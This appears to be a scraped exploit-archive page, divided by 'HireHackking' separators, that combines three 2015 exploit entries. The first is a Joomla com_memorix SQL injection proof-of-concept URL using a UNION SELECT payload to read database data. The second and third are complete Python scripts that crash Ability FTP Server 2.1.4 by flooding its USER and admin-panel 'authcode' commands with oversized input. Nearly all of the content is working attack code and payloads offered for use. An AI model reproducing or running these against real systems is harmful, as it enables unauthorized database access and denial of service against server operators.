
# Exploit Title: Joomla com_memorix component SQL Injection vulnerability # Date: 13-08-2015 # Software Link: N/A # Exploit Author: Omar AbuHassan # Contact: https://www.linkedin.com/pub/omar-abu-hassan/bb/600/960 # CVE: N/A # Category: webapps # Version: All # Tested on: Kali linux (x64) / Windows 8.1 pro (x64) 1. Description Normal user can inject sql query in the url which lead to read data from the database. 2. Proof of Concept http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594 (SQLI) Injected column is # 3 http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594+union+select+111,222,version(),444,555,666,777,888,999--+AbuHassan ** No solution yet from vendor ** ####################### # Greets to Palestine # #######################
HireHackking
#!/usr/bin/env python # # Exploit Title: Ability FTP Server afsmain.exe USER Command Remote Dos # Date: 2015-08-15 # Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com> # Twitter: st0rnpentest # # Vendor Homepage: www.codecrafters.com # Software Link: http://www.codecrafters.com/AbilityFTPServer # Version: 2.1.4 # Tested on: Windows 7 # import socket import sys import os def clear(): os.system("cls") def banner(): print "############################################".center(80) print "# Ability FTP Server DoS PoC #".center(80) print "# Author: St0rn #".center(80) print "# <fabien[at]anbu-pentest[dot]com> #".center(80) print "############################################".center(80) def createconn(ip): s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((ip,21)) except: print "\n" print "[+] Server Down!".center(80) sys.exit(0) return s def crash(sock): try: while 1: sock.send('USER '+'a'*99999) sys.stdout.write('.') except: sock.close() ############### Main ############### clear() banner() if len(sys.argv)==2: print "\n" print "Waiting 2 or 3 minutes before crash".center(80) print "(The server can be run without afsloader.exe)".center(80) while 1: s=createconn(sys.argv[1]) crash(s) else: print "\n" print "Usage: AftpDos.py [Server IP]".center(80) sys.exit(0)
HireHackking
#!/usr/bin/env python # # Exploit Title: Ability FTP Server Admin Panel AUTHCODE Command Remote Dos # Date: 2015-08-15 # Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com> # Twitter: st0rnpentest # # Vendor Homepage: www.codecrafters.com # Software Link: http://www.codecrafters.com/AbilityFTPServer # Version: 2.1.4 # Tested on: Windows 7 # import socket import sys import os def clear(): os.system("cls") def banner(): print "############################################".center(80) print "# Ability FTP Server Admin panel DoS #".center(80) print "# Author: St0rn #".center(80) print "# <fabien[at]anbu-pentest[dot]com> #".center(80) print "############################################".center(80) def createconn(ip): s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((ip,7200)) except: print "\n" print "[+] Server Down!".center(80) sys.exit(0) return s def crash(sock): try: while 1: sock.send('authcode '+'a'*99999) sys.stdout.write('.') except: sock.close() ############### Main ############### clear() banner() if len(sys.argv)==2: print "\n" print "Waiting before crash".center(80) print "(The server can be run without afsloader.exe)".center(80) while 1: s=createconn(sys.argv[1]) crash(s) else: print "\n" print "Usage: AftpAdminDos.py [Server IP]".center(80) sys.exit(0)